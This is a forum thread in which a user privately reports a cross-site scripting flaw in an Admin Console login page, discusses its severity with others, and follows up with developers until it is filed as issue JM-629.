XSS in login facility of Admin Console

There is a cross site scripting security vulnerability in the login page of the Admin Console. I think this is a very sensitive issue to publish here so please one of the developers contact me or post an email address to communicate.


Interesting. Have you received any reply from devs?

Though, unless some portal feature will be created i dont see any threats. At least in my case. Only admin should be logining into it. So my firewall is blocking all othe IPs and machines to connect to it. Well, if you need a greater mobility and expose Admin Console to internet, then this could be harmfull.

Hi Wroot

No I haven’'t.

Well it is not a problem outside-in but inside-out. First, since the XSS is located in login page your credential as administrator can be stolen and sent to a public web site.

Usually firewalls are not configured to block connections from your computer to the internet for your browser. Then that information can be exploited the same way by an spyware attached to your IE (in case you use windows). Anyway sadly not everybody has a personal firewall installed (I have too ). I’'m aware that since the administrative interface is not attached to the ethernet card but to the loopback interface this is not a Critical issue but it is still a security leak.

Well it is not a problem outside-in but inside-out.

I see now. Well, i think my PC which i’‘m connecting with to Admin Console is not likely infected and i’'m not using IE, but if there really is such issue it should be fixed.

You can try emailing Matt by yourself. You can find his email in his Public Profile.


I don’'t see your email address, but please feel free to email me directly (address in my profile).



Update: I found the issue as well and am creating a fix now.



Sorry I didn’‘t get notifications on your posts. Anyway I’'m sending you the info I got for you to confirm.

Regards and thanks

Hello, Sorry to bother you guys again but this issue is not fixed yet. Please help me to have this fixed.

Read my coments at http://www.jivesoftware.org/issues/browse/JM-430




Thanks for following up. I filed this as JM-629.